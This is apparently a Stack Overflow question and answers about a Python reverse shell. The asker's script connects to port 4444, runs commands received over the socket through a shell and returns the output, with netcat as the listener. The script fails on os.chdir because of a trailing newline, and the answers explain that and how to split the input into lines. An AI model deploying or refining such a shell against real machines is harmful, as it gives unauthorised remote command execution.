# I can not change a directory with a reverse-shell (tcp ip) coder in python

Tags: python, shell, tcp, reverse-shell

I tried to code a reverse shell in python (reverse tcp ip) with netcat and I can not change the directory with the module os.chdir () here is my code:

```
import socket 
import subprocess
import os

host = 'localhost'
port = 4444

s = socket.socket()
s.connect((host,port))


while True:

directory = ("\n" + os.getcwd() + ">")
directory = directory.encode()
s.send(directory)

data = s.recv(1024)
if data[:2].decode('utf-8') == 'cd':
    os.chdir(data[3:].decode('utf-8'))
else:
    comm = subprocess.Popen(str(data, "utf-8"), shell=True, stdout=subprocess.PIPE)
    out,x = comm.communicate()
    s.send(out)
```

I proceed by listening to port 4444
With netcat by doing: nc -lvp 4444
And running my scrypt here is the error:

```
file "reverse-tcp.py", line 20, in <module>
os.chdir(data[3:].decode('utf-8'))
OSError: [WinError 123] 
A syntax of file name, directory, or volume is incorrect 
'C:\\Users\\Isabelle\\Desktop\\dossier\n'
```

Comment: what is the purpose of segregating the commands you run through the shell?  When you establish it, you can find the os pretty easy and then just running commands or subsequent scripts.

Comment: Please format and indent your code properly.

Answer (score 0):

The problem is related to the file name: `C:\\Users\\Isabelle\\Desktop\\dossier\n` where `\n` is [Linefeed (LF)](https://docs.python.org/2.0/ref/strings.html). 
The result is a invalid path.

Answer (score 0):

You're including the line separator at the end of the command in the name of the directory you are changing to. You could solve it by `rstrip`ing the line separator off, but you're likely to encounter future issues if you take that approach.

You're receiving raw blocks of data, which may contain multiple lines. There is no guarantee `data` contains a single command, or even an entire command. There should be processing to break the input into lines, and if `data` ends in the middle of a line, to join it with the first line of the next `recv`.

Comment: No one on StackOverflow is here to [write your code](https://meta.stackexchange.com/questions/52101/how-to-respond-to-people-just-asking-for-code-without-any-own-effort) for you. There is an example of reading by line in this other question's answer: https://stackoverflow.com/a/16512082/20068

Comment: Sorry I have not very well understood can you better explain to me how to solve is problem